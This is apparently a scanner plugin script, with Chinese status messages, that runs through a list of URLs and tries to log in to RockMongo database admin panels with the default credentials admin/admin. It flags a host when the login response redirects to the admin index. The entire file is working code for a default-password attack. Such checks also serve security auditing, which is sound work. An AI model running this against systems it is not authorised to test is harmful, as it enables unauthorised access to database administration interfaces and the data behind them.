#request urls = array
#define payload = /index.php?action=login.index&host=0
#define bug = /index.php?action=admin.index&host=0
#define info = rockmongo-default-password
#define post = more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpPost(url.payload,post,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[1],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
